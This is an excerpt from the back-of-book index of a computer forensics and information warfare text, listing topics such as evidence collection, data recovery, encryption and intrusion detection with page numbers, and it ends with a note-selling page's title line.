retention in crime investigation,
359
seizure
described, 11, 21, 53
rules of, 230, 715
storage/analysis of, 251–252

testing, 308
and text, structured, 575
unrecoverable, 706
vulnerability of, 628–629
Databases
data mining in, 569–577, 605
files, searching, 307, 308, 309
forensic, for networks, 318–319
hidden, 71
Data-driven attacks defined, 107, 797
Data encryption standard (DES), 631,
632
DataHaven Project Inc Web site url,
421
Data mining, 569–577
Data objects defined, 327
Data recovery
automated, 205–206
backup and, 192–203, 212–213,
243
case studies, 27–28, 304, 717–718,
719
described, 11, 15, 61, 191–192,
203–206, 214, 705–708
of email, 216, 467, 546, 623
exercises, 186
from fax machines, 10, 183
financial records, 10, 278
on hard disks, 7, 496
hidden, 206–209
from laptop computers, 27, 210,
240
on linux systems, 207–209, 213
principles of, international, 329
software for, 496
on Unix systems, 207, 216, 505,
677, 678, 679
Data Recovery Checklist Form,
755–756
Data storage media
duplication of, 14
examination of, 22
Data theft via wireless systems, 116
Data warehouse, stages of, 317,
328
DAT (digital audio tapes) tapes, data
recovery from, 28, 211
Dates, decoding, 70
Datum defined, 797
Daubert standard defined, 237
DBA (Dominant battlespace awareness), 797
DBK (Dominant battlespace knowledge), 797
DDOS attacks
...
See Discovery of electronic
evidence (DEE)

Index

Defense Advanced Research Projects
Agency (DARPA) on IW capabilities, 354, 372–373, 588
Defense information infrastructure
(DII), 797
Defensive counterinformation, 797
Defensive Strategies for Governments
and Industry Groups Checklist
Form, 765–768
Defragment, 707, 797
Degradation of service, 797
Democracy and IW defense, 596–597
Denial of service (DOS) attacks
...
See Digital certificates;
Identity management security
systems
Digital Intelligence Incorporated,
709
Digital Mountain, Incorporated, 784
Digital signatures
authentication
of log files, 248
of software, 259
described, 263
matching, 655–656
penetration, 811
and PKI, 113, 114
RSA standard for, 64
Dig-x utility defined, 168
DII (Defense information infrastructure), 797
Direct Access Memory (DMA), 798
Directed-energy protective measures,
798
Direct information warfare, 798
Directory defined, 798

DIRT-CDS (Data Interception by
Remote Transmission from Codex
Data Systems) described, 52–53
Disaster recovery systems
networks, 112–113
Discount rate defined, 88
Discovery of electronic evidence (DEE)
as litigation tool, 278–281
overview, 277–278, 281
Discovery of Electronic Evidence
(DEE) Checklist Form, 759–760
Disks
...
See Denial of service
(DOS) attacks
DOS operating system, security of, 280
Dow Chemical, 616
Dragonflies, mechanical, 536–538
DRAM (Dynamic random access
memory), 798
Driver defined, 799
Driver firmware, data erasure on, 26
Duplication and Preservation of
Digital Evidence Checklist Form,
757–758

823

Dutch Shell Group, 295
Dynamic ports, assigning, 72
Dynamic random access memory
(DRAM), 798
E
Echelon, 475, 495, 616, 617
E-commerce investigations, software
for, 46–47
Economic crime defined, 699
Economic espionage
...
See also Electromagnetic bombs
Electronic hardness defined, 510, 516
Electronic jamming, 522
Electronics intelligence (ELINT), 799
Electronics security, 799
Electronic surveillance
...
detection, 120
and privacy, 90, 627–628
public key (See Public key encryption)
purpose of, 628
regulation of, 637–640
satellite (See Satellite encryption
security systems)
symmetric, 630–632
English Civil Evidence Act of 1968, 28,
29
Enhanced 911 (E911), 551, 554, 561
Enhanced integrated drive electronics
(EIDE), 799
Enhanced signal strength (ESS)
method, 560, 563
Enmeshing phenomenon, 473
Entrapment, 800
Environmentalists, terrorism by, 404
Escrowed encryption, 494–495, 597
Essential elements of friendly information, 800
Ethics of information warfare (IW),
590–597, 619–620
Eudora, 68
Event reconstruction
described, 30, 303–304, 309

procedure, 304–305
Evidence
admissibility, 6, 29, 155, 220, 230,
235, 248, 254
authentication, 182
collection
legal requirements, 247–253,
272, 327
methodology, 164–165,
218–219, 224–230, 263
overview, 70, 217–218,
229–231, 309, 684
processing procedures, 39, 42,
58, 177, 221, 239–247,
254–255
services, obtaining, 163–164
copy process, characteristics of, 250
defined, 20
documentary, 183, 278–279, 283
electronic
converting, 304–310
damaging of, 321–323
defined, 327, 700
problems with, 18, 65, 74, 75,
235, 254
procedures, 3, 19, 38, 327,
673–676, 693–695, 700
storing, 37
integrity/security of, 7, 24–25, 41,
98, 106, 258, 268, 307
legal tests for, 21–22, 58–60, 79
notebook, maintaining, 249–251,
321–322, 678
preservation, 17–18, 39, 59, 239,
241, 250, 254, 679–680, 686
proving, 23
rules of, 220–223, 232, 236–238
standards, 237, 320
trace, value of, 10
types of, 20, 219
volatile, 223
Evidence Collection and Data Seizure
Checklist Form, 756–757
Evidence Identification and Retrieval
Checklist Form, 747–748
EvilPing attack, 441
Exculpatory evidence defined, 220, 230
Executable defined, 800
Executive IW-D Oversight Office, 399
Executives
in computer crime commission,
285
in security policy implementation,
270
Exercises, answers to, 725–745
Expansion card defined, 800
Expert witness services, 7, 12, 60, 222
Extortion in cyberspace, 439
Extract defined, 800
Extraction of biometrics, 142
F
Fair Credit Reporting Act, 603, 605

Falun Dafa, 637
Falun Gong, 339–340
FAQs (Frequently Asked Questions),
705–708
Faraday cage, 516
Fast save function, 496
Fax machines, data recovery from, 10,
183
FBI survey 2003 on computer crime
financial impacts, 5
FDIC netforensics home page, 716
FDISK defined, 800
Federal Computer Incident Response
Center (FCIRC), 681–682
Federal Intrusion Detection Network
(FIDNet)
described, 495
and intrusion detection, 384–385
Federal rules of civil procedure on data
seizure, 11
Federal Rules of Evidence on electronic
evidence, 29, 58, 77, 237
Federated model of identity management, 135–137
Feynman, Richard, 540
Fiber-optic connections, bandwidth of,
111, 577–578
Fidelity and Deposit Companies, 599
FIDNet
...
See also
Defragment
Fraud investigations
case histories, 25–26
electronic evidence in, 20, 278
of employees, 154
Fred Cohen and Associates, 709
Fred software, 676
Freedom Network, 652

Free for all links page, 801
Free speech, proliferation of, 438
Friction of war, 801
FrontPage extensions, 801–802
Frost & Sullivan, 655
Frye standard defined, 237
FTP (file transfer protocol)
account defined, 802
anonymous, 792
encryption issues with, 63
Funds, diverting, 79
Fuzzy logic tools in text searching, 179
G
G8 Group, 673, 700
Gateway defined, 119
Ghost accounts in computer sabotage,
663
GIA (Algerian Armed Islamic Group),
416
GIAC
...
, 684
Hard disks
backup/restoration of, 40, 41
copying, 269, 271
data recovery on, 7, 496
examination of, 22, 242–246
shipping, 707–708
Hardware
evidence collection, labeling in,
231–232, 242
failures and backup procedures,
204
requirements
for data conversion, 306, 311
for evidence processing, 321
Hashes
block values, generating, 263–264,
268
in encryption, 263–264, 268, 634,
677
SHA256 (See Secure Hash Algorithm (SHA256))
Head defined, 802
Header of email and Internet tracing,
65–69
Health Insurance Portability and
Accountability Act (HIPPA), 614,
615
Hearsay evidence defined, 20, 219
Heat sink defined, 802
Helsingus, Johann, 651
HERF (High-energy radio frequency)
guns in IW, 363, 444, 445, 509
High Tech Crime Cops, 714
High Tech Crime Investigation Association, 710
Hijacking defined, 802
HIPPA (Health Insurance Portability
and Accountability Act), 614, 615
History defined, 802
Hizb-ut-Tahrir (Islamic Liberation
Party), 417
Holocaust deniers in IW, 419
Homeland security systems described,
143–144, 147
Honeynet described, 668
The Honeynet Project, 530–531, 649,
650
The HoneyPot Project described,
266–267
Honeypotting defined, 226, 668, 669
+host:domain name and hack command defined, 170
Hotspots, locating, 296
Human resources and computer
forensic specialists, 9–10
Hycamtin, 291, 292
Hyperwar defined, 802

826

Index

I
IBM 3590 drive, data recovery from,
210
IBW (Information-based warfare), 803
ICMP
...
See Information and communication technologies (ICTs)
IDC, 655
IDEA (International Data Encryption
Algorithm), 631
Identification of Data Checklist Form,
760–761
Identify-preserve-analyze-report
model, 686
Identity fraud, prevalence of, 131
Identity management
access, controlling, 133, 150
audits in, 133, 151
digital, aggregation in, 130
Identity management security systems
in authentication, 258–259
described, 129–137, 147
Identity theft
exercises, 150–151
overview, 137–141, 606–609
Identity Theft Hotline contact information, 141
IDW (Information Dominance Warfare), 804
IIW (Information in Warfare), 804
Images
...
See Corporations
Info-niche attacks in netwar, 346, 347
Information
collection, 804

compromise, 804
defined, 360, 803
denial, 804
destruction, 804
dominance, 804
friendly, essential elements of, 800
function, 804
protection, 805
realm, 805
superiority, 805
terrorism, 805
transport, 805
warfare (See Information warfare
(IW))
Information Age defined, 803
Information Age warfare, 803
Information and communication
technologies (ICTs)
applications in IW, 394, 396, 415,
418, 419
C2W and, 420
Information attack, 803
Information-based warfare (IBW), 803
Information Dominance Warfare
(IDW), 804
Information extraction (IE) in data
mining, 576–577
Information infrastructures, importance of, 585–588, 621
Information in Warfare (IIW), 804
Information Operations, 804
Information strategies defined, 408
Information systems (INFOSYS), 805
Information systems warfare (ISW),
805
Information technology
diffusion of, 587
system defined, 360, 366
Information Technology Sharing and
Analysis Center (IT-ISAC) described, 343, 490
Information Warfare: Arsenal of the
Future Checklist Form, 772–775
Information Warfare Arsenal and
Tactics of Private Companies
Checklist Form, 771–772
Information Warfare Arsenal and
Tactics of Terrorists and Rogues
Checklist Form, 769–771
Information Warfare Arsenal and
Tactics of the Military Checklist
Form, 768–769
Information warfare (IW)
...
See Filter_G
software
INTELSAT Convention, 596
International Association of Computer
Investigative Specialists, 648, 710,
714
International Data Encryption Algorithm (IDEA), 631
International Organization on Computer Evidence (IOCE) described,
322, 329
International organizations in IW,
354–359
International Telecommunications
Convention of 1982, 596
Internet
abuse, detection of, 52, 74, 180,
315, 701
authentication on, 259

Index

as Big Brother, 577–578
children, protecting, 128, 232, 535
and cyberterrorism, 417, 420, 424,
460
encryption described, 64
and industrial espionage, 127,
291–296
and privacy awareness, 127
security systems, 84–91, 146, 148
tactical, 815
tracing methods, 65–69, 96
wireless, 579–580
Internet Control Message Protocol
(ICMP), 104, 289
Internet Merchant Account defined, 88
Internet Resources on Technology
Law, 713
Internet Security Systems Incorporated
(ISS), 666
Internet Service Providers (ISPs) and
network security, 480–481,
484–487
Interpact Incorporated, 711
Intrusion detection systems
anomaly-based, 655–656
appliance-based, 656–657
described, 91–99, 146, 148, 149,
157, 315, 329–330, 667–668
firewalls and, 93–94, 148, 149,
325
history of, 384, 653–656
implementing, 163
network signature-based, 655, 668,
669, 697
outsourcing of, 657
and packet sniffers, 528
response in, 160, 323–324
speed of, 656
IOCE
...
See Information Technology
Sharing and Analysis Center (ITISAC) described
IW
...
See Information
warfare (IW)
Kroll Ontrack, Incorporated, 786
L
Ladenese Epistle, 418–419
LAN 802
...
See Location-based services (LBS)
LC Technology, 787
LC Technology International, Incorporated, 786–787
Leads, identifying, 38
Leapfrog attack, 806
Lee, Wen Ho, 434, 452
Legal/court related sites, 714
Legal issues

827

in computer forensic evidence,
20–21, 58–60, 79, 155, 247–253
in cyberwarfare, 341, 586
evidence
collection, 247–253, 272, 327
overview, 21–22, 58–60, 79
Legislation for IW defensive measures,
493–494
Letter bombs, 807
Liability, demonstrating, 30
Libertarian Party, 422
Liberty virus, 115
+link:domain name command defined, 170
Linux systems
data recovery on, 207–209, 213
file cleansing utilities, 208–209
Litigations, sources of, 30–31
Loc8
...
See Message Digest 5 (MD5)
Measurement and Signal Intelligence
(MASINT) defined, 807

828

Index

Measurement and Signature Intelligence defined, 807
Media
conversion, 11
previewing, 687–689
Media broadcasts in IW, 345–347
Medical ID cards, 613–615
MEII (Minimum essential information
infrastructure) defined, 807, 808
Memory
copying, 272
dumps and evidence preservation,
42, 77
resident programs, understanding,
180
MEMS (Microelectrical and mechanical systems), 535
Merchant defined, 88
Message defined, 807
Message Digest 5 (MD5)
hash functions in, 634
in PGP, 122, 123
in timekeeping, 291
MessageID described, 67
Metal oxide semiconductor (MOS)
devices in IW, 511
Microbes in IW, 521
Microelectrical and mechanical systems (MEMS), 535
Microsoft and privacy issues, 603
Microsoft Internet Explorer, 604
Microsoft Outlook/Outlook Express,
viruses in, 57
Microsoft Word in crime scene investigation, 238
Microsoft WordPerfect™ in crime
scene investigation, 238
Middle East cyberwars, 441–444, 464
MIE (Military Information Environment) defined, 807, 808
Military computer forensics technology, types of, 36–38
Military deception, 807
Military Information Environment
(MIE) defined, 807, 808
Military information function, 808
Military Information Operations
(MIOs), 360, 446
Military information warfare tactics
(MIWT) described, 376–377, 387
Military operations and information
systems, 587
Military strategy in cyberwarfare,
350–354, 359–360, 371–374,
376–377, 392–394, 580
Military technical revolution (MTR),
808
Minimum essential information
infrastructure (MEII) defined, 807,
808
Mirkin, Chad, 540
Mirror image backup software
...
See also Bit stream
image backups in evidence preservation
Misbehavior in the face of the enemy
defined, 477–478
Missiles and electromagnetic warheads,
514
Misuse detection, 808
Mitnick, Kevin, 422
Mitretek Systems, 713
Mockingbird, 808
Mohammed, Ali, 454, 455, 456
Mohammed, Omar Bakri, 417
Monthly traffic defined, 808
...
hst file, 496
Netscape Navigator, log files in, 496, 604
Netstat command, 679
Net Threat Analyzer software described, 46–47
Netwar
...
See Network Time Protocol
(NTP)
Nuclear weapons
obtaining, 452–453
in terrorism, 402–403, 425–427,
450–451, 545
NutraSweet, intelligence unit of, 293
O
Objective reasoning, threats to, 347,
350, 352, 353, 369
...
Ortega, 248
Odd person out attacks described,
120–121
Offensive counterinformation, 809

Index

Omega Engineering, 664
One-time pad method of encryption,
629–630
The Onion Router Project, 497–498, 653
Onion routing described, 498, 651–652
OODA loop
and C2W, 382–383
defined, 809
Open-source intelligence, 809
Operational intelligence, 809
Operation Desert Storm, 519
Operation Iraqi Freedom, C2W in, 383
Operation Other Than War (OOTW),
590–591, 809
Operations security (OPSEC) defined,
381, 809
Opinion defined, 809
OPLAN 3600, 378
OPSEC (Operations security) defined,
381, 809
Optical networking and IW, 373, 518
Oracle Corporation, 297
Orientation defined, 809
Ortega, O’Connor v
...
SYS in evidence detection,
75
Palestine in cyberterrorism, 441
Parallel warfare described, 393–394
Partitions
...
See also Objective reasoning, threats to
defined, 811
manipulation of, 349, 366
Performance of SANs, 111
Peripherals
changes in, 23
described, 811
Personal assets, destruction of,
597–600
Personal identification numbers
(PINs) and cellular telephony, 611
Personal Locator System (PLS)
applications, 561–564
architecture, 555–556
implementing, 564
overview, 554
technologies, 556–561
PGP
...
See Public key infrastructure
(PKI) systems described
Plagiarism, detecting, 569
Plants as bioterrorism targets, 430–431
PLS
...
org, 710
Pornography viewing
investigating, 232, 255, 287–288,
719
statistics, 165, 241
Port numbers
attack points, common, 661, 669
ranges, 71–72, 78
Position, computing, 559
Post-apocalyptic terrorist groups,
403–404
POST (Power-on self test) defined, 811
Poulsen, Kevin, 422
Pragmatic communication defined,
348–349
Premiums for hacker insurance,
598–599
Pretty Good Privacy (PGP), 64,
122–124, 636
Prevention defined, 94
Principle Forensic Activities Checklist
Form, 748–750

829

Principle of least privilege defined, 102
Privacy
and biometric systems, 483
encryption and, 90, 627–628
in evidence collection, 248,
267–268, 675
and firewalls, 105–106
and hacker pursuit, 460
and LBS, 550, 563
maintaining, 529–530, 602–603,
627
medical, 613–615
monitoring, 609–613
net systems described, 126–129
policy
enforceability of, 489
key elements of, 132–133,
147
in Windows environments,
566–569
Privacy agreements described, 488–489
The Privacy Foundation, 529–530, 545,
566, 567, 616
Private companies
...
See Psychological operations
(Psyops)
Public information defined, 85
Public key encryption
and cyberterrorism, 424–425
described, 63, 86, 114, 120–121,
147
for IW defensive measures, 494
limitations of, 632–636
message path, 121
in PGP, 124
in timestamping, 291
Public key infrastructure (PKI) systems
described, 113–114, 147
Publisher IDs, 264
Punishment for hacking, 600
Purity Wholesale Grocers, 664
Q
QuickFire attack, 441
R
Radar in cyberterrorism, 451
RadioCamera system, 560
Radio frequency (RF) fingerprinting,
609, 611

830

Index

RAID (redundant array of independent disks) disks
data recovery from, 211
data storage on, 22, 26
management of, 110–111
RAM (Random Access Memory), 811
Random text displayer described, 812
RC4, 631
Read heads, development of, 540–541
Real evidence defined, 20, 29
Real time audio/video described, 812
Reconstructing Past Events Checklist
Form, 761–762
Records, access to, 277–278, 283
ReFLEX two-way paging, 564
Registry, the, 685, 815
Reject all cookies option, 566
Relevancy test of evidence defined, 237
Reliability of SANs, 111
Remailers and encryption, 497
Remediation of IW attacks, 356–357
Renew Data, 788–789
Replay attacks, 290
Reports as evidence, 29, 317
Requirements definition, 685–700
Research in Motion (RIM) wireless
technology
evidentiary value of, 69–70
file system in, 70–71
Restoration ecologists, terrorism by, 404
Retina, 662
Retro-virus described, 812
Review questions, answers to, 725–745
Revolution in Military Affairs (RMA),
587, 812
Right-click defined, 812
RIM devices
...
See Rivest, Shamir, and
Adleman (RSA) standard

Rules of engagement, 596
Rules of evidence
...
See Systems Administrator
Networking and Security (SANS)
SANs
...
, 552, 553
Scavenging defined, 812
SCPAs
...
See Synthesizing Information
from Forensic Investigations (SIFI) environment
Signal defined, 814
Signal direction PLS, 556–557
Signal security (SIGSEC), 814
SignalSoft Corporation, 551
Signal strength method, 559–560

Index

Signature matching, 655–656
SIGNCODE
...
See also Packet sniffers described
defined, 814
passwords, obtaining, 552
tools, 527–529, 595
in wireless systems, 116
Sniffit software, 527–528
Snooping tools, 527–529
Social engineering, 376, 663, 814
Societal aspects in cyberspace, 469–470
Socket defined, 815
SODA Project, 443–444
Software
antivirus (See Antivirus software)
for attack detection, 156–157
backdoors, planting, 363
case-management, 282
changes in, 23, 646
copying packages, 269
for data recovery, 496
designing, 47
doomsday, 342
integrity, maintaining, 357
publisher IDs, 264
for risk assessment, 45
for security reviews, 47–50
theft recovery, 53–55, 77
tools, capabilities of, 684
useful sites, 168, 170, 179, 715
vulnerabilities
communication of, 646
hacking, 662
SOS (System of systems) defined, 815
Source addresses, 650–651
Source address spoofing, 650
Soviet Union
...
See Secure Sockets Layer (SSI)
encryption
SSID
...
See also
Cyberterrorism
information, 805
religious, 463
state-sponsored, 464
Terrorists
cells, disrupting, 457
methodology, 430–433
organization of, 395, 463, 464
profile of, 421–424, 428, 438–439,
645
recruitment of, 458–459
tactics in IW, 415–421, 424–427
Testimonial evidence defined, 20, 219
Testing
evidence, 21–22, 58–60, 79
security, 640–641
of systems, 324–326
Text, searching, 47–50, 178–179, 207,
243–244, 560–577, 685
TextSearch Plus software described, 45,
47–50
TFL:IDS, 657
The Coroner’s Toolkit, 710
Theft defined, 155
Theft recovery software described,
53–55, 77
Thermionic technology and EMP
attack, 517
Third-wave warfare, 815–816
Threats, passive, 810
Time bomb described, 816
Time difference of arrival (TDOA)
method, 557
Time element deductibles, 599
Time stamps
in authentication, 263–264
in evidence collection, 228, 243,
690
overview, 288–291
Timing attacks, 635
TJPing utility and Internet tracing, 67,
68

832

Index

Total Recall (Binary Biz North America), 789
Trace evidence, value of, 10
Traceroute command defined, 169
Trade sanctions, evading, 439
Traffic amplification via Web site, 442
Transactions, electronic, demonstrating, 30
TRANSEC (Transmission Security),
816
Trans Union, 607
Trap doors
in cyberterrorism, 508, 521
defined, 816
information, obtaining, 658
Triple DES (Data encryption standard), 631
Trojan horse programs
described, 816
and evidence preservation, 42, 177
in IW, 336, 477, 508, 520, 521, 545,
595
protection from, 56–57, 668
Troll described, 816
TrustE, 489
TUFCOFS, 711
Tunneling defined, 94
Twofish, 631
U
Unallocated file space, 816
UN Convention on Law of the Sea, 596
UNICODE, 688, 690
Unilever, 294, 295
Unintentional emission (UE), detection/tracking of, 513
United States
cyberwarfare, protecting against,
462
IW capabilities of, 357, 365–366,
378, 622
IW preparation status, 335–339,
350–351, 362, 366–367,
423–424, 439, 587
PLS in, 554
on privacy issues in IW, 602
and terrorism, 391–392, 400, 408,
429–432
on weapons availability of enemies,
446–448
UNITY, 443
University of Central Florida-Orlando,
648
University of Delaware Web site url,
290
Unix systems
data recovery on, 207, 216, 505,
677, 678, 679
DNS service on, 324
timekeeping in, 289, 290
Unzip defined, 816
US
...
See also Authentication
Vandal described, 816
Van Eck radiation, suppressing, 513
Vector-space method of text exploitation, 575–576
Vehicles, locating, 554, 573–574
Vendor and Forensic Services Types
Checklist Form, 754–755
Vendors in software evolution, 646
Verification
...
See
Intrusion detection systems
Vulnerability defined, 817
W
Wal-Mart Stores, 293
War, Act of defined, 591–592
War defined, 817
War dialer defined, 817

War driving/flying defined, 296
Warfare defined, 817
Warm boot defined, 817
Wassenar Management, 639
Weapons of mass destruction
electromagnetic bombs, 509–510
and IW-D, 401–402, 405
tools, obtaining, 452–453
Weapons of precise disruption, 376
Web-based Telnet, 817
Web bugs in Word documents,
566–569, 583
Web images, copying, 56
Web of Justice Links, 714
Webraska, 551
Web services
access control for, 325–326
and digital identity management,
130–131
Web sites
crime, case histories, 25
defacement of, 443
security of, 662
traffic amplification via, 442
WEP
Title: COMPUTER FORENSIC
Description: It is very cler notes to learn a subject.It is so easy and it is very clearly written.
Buy These NotesPreview